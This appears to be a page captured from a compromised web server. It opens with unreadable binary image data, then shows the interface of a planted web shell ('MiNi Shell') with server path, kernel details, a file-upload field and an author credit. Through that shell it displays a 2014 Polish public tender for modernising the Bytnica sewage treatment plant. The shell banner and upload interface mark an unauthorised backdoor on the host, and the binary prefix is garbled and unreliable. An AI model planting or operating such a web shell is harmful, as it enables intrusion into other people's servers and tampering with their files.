JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140326/102874-N-2014.html

<p class="kh_header"><b>Bytnica: Modernizacja oczyszczalni ścieków w Bytnicy wraz z przepompowni ścieków</b><br>
<b>Numer ogłoszenia: 102874 - 2014; data zamieszczenia: 26.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej w Bytnicy , 66-630 Bytnica, woj. lubuskie, tel. 0-68 391 56 00, faks 0-68 391 56 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.bytnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oczyszczalni ścieków w Bytnicy wraz z przepompowni ścieków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Dostawą i montaż oraz podłączenie do istniejącej instalacji elektrycznej prasy filtracyjnej wraz z przenośnikiem osadu do odwodnienia osadu ścieków  
1) Opis istniejącego stanu odwadniania osadów.
Osad nadmierny gromadzony jest w dwóch zbiornikach osadu nadmiernego - każdy o pojemności  15 m3. Pompa osadu podaje osad na prasę typu Drajmad. Do osadu dodawany jest polielektrolit zespołem  przygotowania polielektrolitu. Prasa zamontowana jest w ocieplonym pomieszczeniu zwanym pomieszczeniem prasy o wymiarach 3,40 x 3,90 x 3,50 m. Wejście do pomieszczenia prasy odbywa się drzwiami bezpośrednio z zewnątrz (z placu) o wymiarach w świetle ościeżnicy  1,30 x 2,30m. Pompa osadowa zespołu przygotowania polielektrolitu jest obok prasy.  Prasa do odwadniania osadu i zespołu przygotowania polielektrolitu  umieszczone są  w pomieszczeniu osadu. W pomieszczeniu znajduje się również zbiornik na pix o poj. 1000l ze stacją dozowania pixu.
2)  Wymagania techniczno- eksploatacyjne zestawu do odwadniania osadu (przedmiot zamówienia):
Prasa taśmowa:
- wydajności objętościowej od  5 do 7 m3/h.
- wydajności masowej od 150 do 210 kg suchej masy/h.
- elektroniczna regulacja prędkości taśmy za pomocą falownika
- napęd min. 0,5 kW
Pompa wody popłucznej:
- wydajność  min. 5,5 m3/h.
- moc  od 2 d. 3 kW
Automatyczna stacja polielektrolitu:
- pojemność zbiornika min. 1000 litrów
- moc mieszadła min  0,75 kW
- wydajność pompy elektrolitu dobrana do prasy odwadniania osadu
- pompa śrubowa
Pompa osadu:
- śrubowa
- wydajność 1,5-9 m3/h 
- moc od 1,5 do 2,5 kW 
- regulacja pracy za pomocą falownika
Szafka sterownicza:
- ma zapewniać sterowanie wszystkimi urządzeniami w procesie odwadniania osadu dostarczonymi przez Wykonawcę
- klasa ochronna IP 55
- zasilanie szafki sterowniczej prasy przewodem z szafy elektroenergetycznej w budynku oczyszczalni (pom. sterowni) lub przewodem zasilającym istniejące urządzenia do odwadniania osadu pod warunkiem, że istniejący przewód będzie wystarczający do zasilania nowego zespołu urządzeń do odwadniania osadu. 
Przenośnik spiralny bezwałowy do transportu osadu:
a) przenośnik
- przepustowość przenośnika od 4 do 6 m3/h
- długość przenośnika min. 5,0m
- koryto w kształcie litery U o grubości  min 2,5 mm
- pokrywa rynny o grubości min.  2 mm
- kąt instalacji 15 - 25 stopni
- koryto i pokrywy wykonane ze stali nierdzewnej
- spirala wykonania ze stali specjalnej odpornej na ścieranie
b) napęd
- min. 18 obr./min.
- moc silnika min. 0,5 kW
- zasilanie 400V50Hz 9,0 A
- klasa ochronna IP 55
3) Instalacja i uruchomienie w obiekcie 1 komplet
2.Dostawa i montaż sond tlenowych.
1)Wymagania techniczno - eksploatacyjne zestawu do pomiaru poziomu zawartości tlenu w reaktorach
- przetwornik pomiarowy tlenu szt. 2 ( jeden przetwornik powinien obsługiwać 2  czujniki tlenowe, na wyświetlaczu powinny być widoczne wskazania stężenia tlenu rozpuszczonego i temperatury medium na każdym torze pomiarowym), wyjścia analogowe 0/4 - 20 mA dla obu torów tlenu umożliwiające sterowaniu napowietrzaniem, klasa ochronności IP65,
- czujnik tlenowy Os-8 lub równorzędny o nie gorszych parametrach technicznych z przewodem  szt. 4,
- głowica pomiarowa nurnikowa  MN 120K lub równorzędna o nie gorszych parametrach technicznych do zanurzenia czujnika tlenowego w zbiorniku reaktora szt. 4, 
- wysięgnik l = 2m wraz z uchwytem i łańcuchem do zawieszenia głowicy nurnikowej w zbiorniku szt. 4,
- szafa termostatowana  do instalacji przetwornika tlenu wraz z osprzętem szt. 2.
2) Instalacja i uruchomienie w obiekcie - 2 komplety
3. Dostawa i montaż przepływomierza ścieków surowych
1) Wymagania techniczno - eksploatacyjne zestawu do pomiaru przepływu ścieków surowych:
- elektromagnetyczny czujnik przepływu MAG 5100 lub równorzędny o nie gorszych parametrach technicznych zoptymalizowany do aplikacji wodno - ściekowej o średnicy dn 100 mm, zakres prędkości 0,1 do 10 m/s , zakres przepływów do 250 m3/h , temperatura otoczenia  -40 do + 70 stopni C, temperatura mediów od 0 do + 70 stopni C szt.1
- przetwornik pomiarowy MAG 5000 lub równorzędny o nie gorszych parametrach technicznych, dokładność o,4% aktualnego przepływu + /- 1mm/s, wyświetlacz ciekłokrystaliczny 3 liniowy, funkcje: przepływ chwilowy 2 liczniki, przepływ jedno dwu kierunkowy, komunikaty o błędach, detekcja pustej rury, wyjście prądowe 0/4 - 20 mA, wyjście binarne 11-30 vdc, temperatura pracy -20 do + 50 stopni C, oprogramowanie w języku polskim
- zestaw uszczelniający `
- zestaw do montażu rozłącznego naściennego przetworników pomiarowych
- przewody do podłączenia czujnika przepływu
4.Dostawa i montaż mieszadła zatapialnego
1) Wymagania techniczno - eksploatacyjne mieszadła zatapialnego
-  moc  silnika od 2,8 do 3,0 KW, napięcie znamionowe 400V średnica skrzydła 300 mm, obroty od  850 do 900 obr/min, masa urządzenia ok. 50 kg, kabel o dł. min 10 mb do zamontowania w zbiorniku retencyjnym 
- sygnalizator wilgotności i temperatury zsynchronizowany z mieszadłem
 2) Warunki montażu mieszadła zatapialnego
Warunkiem montażu mieszadła w zbiorniku jest wcześniejsze przygotowanie zbiornika polegające na :
 - demontażu istniejącej przegrody oddzielającej część przeznaczoną do odświeżania ścieków od części stanowiącej komorę czerpalną pomp
- demontaż instalacji do napowietrzania ścieków
- pozioma oś mieszadła powinna być zlokalizowana 30 cm nad dnem zbiornika
- minimalny poziom ścieków w zbiorniku przy którym można włączyć mieszadło Hmin = 70-80 cm
- maksymalny poziom ścieków w zbiorniku Hmax = 220 cm
3) Szczegółowy zakres montażu mieszadła został zawarty w projekcie modernizacji (w części : Technologia  i Elektryczna) istniejącego zbiornika retencji ścieków. 
5.Dostawa i montaż 6 szaf sterowniczych w przepompowniach ścieków wraz z  monitoringiem GPRS i sondami hydrostatycznymi.
 1) Warunki techniczno - eksploatacyjne szaf sterowniczych przepompowniami ścieków:
- układ grzejny z termostatem, wyłącznik różnicowo - prądowy czteropolowy wyłącznik główny, ,gniazdo serwisowe 230/10A, wyłącznik silnikowy zabezpieczające pompy przed przeciążaniem i zanikiem napięcia na dowolnej fazie zasilającej, stycznik dla każdej pompy,  zasilacz z układem akumulatorów, alarm głosowy i świetlny, przełącznik trybu pracy, wyłącznik otwarcia drzwi szafy sterowniczej, antena GSM, gniazdo agregatu
- sterowanie w oparciu o  moduł telemetryczny
- przekładnik prądowy
- sonda hydrostatyczna wraz z 2 łącznikami pływaków
2) Szafy sterownicze powinny być dostosowane do parametrów   technicznych istniejących pomp w przepompowniach.
Parametry techniczne pomp zainstalowanych w przepompowniach:
- PS 1 ścieki oczyszczone działka 58/4  pompy o mocy 2 x  4,0 kW 
- PS 2 ścieki surowe działka 58/4 pompy o mocy 2 x 4,0 kW
- PS 3 działka 36/7 pompy o mocy 2 x 1,9 kW
- PS 4 działka 380 pompy o mocy 2  x 1,5 kW
- PS 5 działka 335/1 pompy o mocy 2 x 4,0 kW
- PS 6 działka 321/5 pompy o mocy 1,1 kW.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.25.21.24-3, 45.23.24.23-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożą, w zakresie niezbędnym do spełnienia warunku posiadania uprawnień od wykonywania określonej działalności lub czynności, oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (w ofercie wspólnej każdy z wykonawców)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) wykażą, w zakresie niezbędnym do spełniania warunku wiedzy i doświadczenia, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, co najmniej jedną dostawę odpowiadającą swoim rodzajem przedmiotowi zamówienia o wartości proporcjonalnej do wartości złożonej oferty (netto), z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane,
2) udowodnią, że dostawy zostały wykonane lub są wykonywane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożą, w zakresie niezbędnym do spełnienia warunku dysponowania odpowiednim potencjałem technicznym, oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożą, w zakresie niezbędnym do spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzą,  że znajdują  się  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają:
 - ubezpieczenie OC od odpowiedzialności cywilnej w zakresie działalności firmy Wykonawcy na minimalną sumę ubezpieczenia określoną na poziomie minimalnej wartości  zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca udzieli na przedmiot zamówienia gwarancji i rękojmi na okres 24 miesięcy licząc od daty odbioru końcowego. Bieg terminu gwarancji i rękojmi rozpoczyna się w dniu następnym po odbiorze końcowym przedmiotu zamówienia.
2. Istotne postanowienia umowy określa projekt umowy, stanowiący załącznik nr 2 do niniejszej SIWZ.
3. Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach podanych w projekcie umowy z uwzględnieniem treści wybranej oferty. Umowa będzie zawarta na wykonanie całości przedmiotu zamówienia określonego w rozdziale III niniejszej SIWZ.
4. W związku z postanowieniami z art. 144 ust.1 Pzp cyt: Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
Zamawiający informuje, że przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, w zakresie i na warunkach określonych w § 11 projektu umowy, stanowiącego załącznik nr 2 do SIWZ tj: 
1.Zamawiający dopuszcza w trybie art. 144 ustawy Pzp możliwość zmiany postanowień zawartej umowy w zakresie:
1) Zmiany terminu wykonania umowy, o którym mowa w § 2 ust.1 w przypadku zaistnienia okoliczności niezależnych od Wykonawcy po ich uwzględnieniu przez Zamawiającego, szczególnie w przypadku:
a) wystąpienia awarii na systemie oczyszczania ścieków uniemożliwiającej prowadzenie prac na obiektach objętych zamówieniem
b) siły wyższej,
c) utrzymywania się nadmiernym poziomem wód gruntowych,
d) wystąpienia zamówień dodatkowych nie objętych umową.
2) Zmiany zakresu rzeczowego i lokalizacji zamówienia wynikających z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy, i nie powodujących zmiany wysokości wynagrodzenia Wykonawcy.
3) Zmiany warunków płatności, w tym sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy wynikających z potrzeb Zamawiającego lub Wykonawcy i nie naruszających interesu Zamawiającego,
4) Zmiany wysokości wynagrodzenia wynikającej ze zmiany stawki podatku VAT.
5) Zmiany podwykonawców w stosunku do zgłoszonych w ofercie, z zachowaniem postanowień § 4 umowy.
2.Wykonawca nie będzie uprawniony do przedłużenia terminu realizacji umowy, jeżeli zmiana jest skutkiem uchybienia czy naruszenia umowy przez Wykonawcę. W takim przypadku koszty dodatkowe związane z taką zmianą ponosi Wykonawca.
3.Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.
4.Nie wymaga zmiany treści umowy w sytuacjach:
1) zmiany siedziby firmy Wykonawcy i Zamawiającego, w przypadku otrzymania pisemnego zawiadomienia o zaistniałej zmianie,
2) zmiany osób do kontaktu ze strony Wykonawcy i Zamawiającego, w przypadku otrzymania
pisemnego zawiadomienia o zaistniałej zmianie,
3) zmiany zapisów w harmonogramie rzeczowo-finansowym do umowy nie prowadzących do zmiany wynagrodzenia umownego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bytnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej w Bytnicy, 66-630 Bytnica 73.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2014 godzina 12:00, miejsce: sekretariat Zakładu Gospodarki Komunalnej w Bytnicy, 66-630 Bytnica 73.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW. Działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com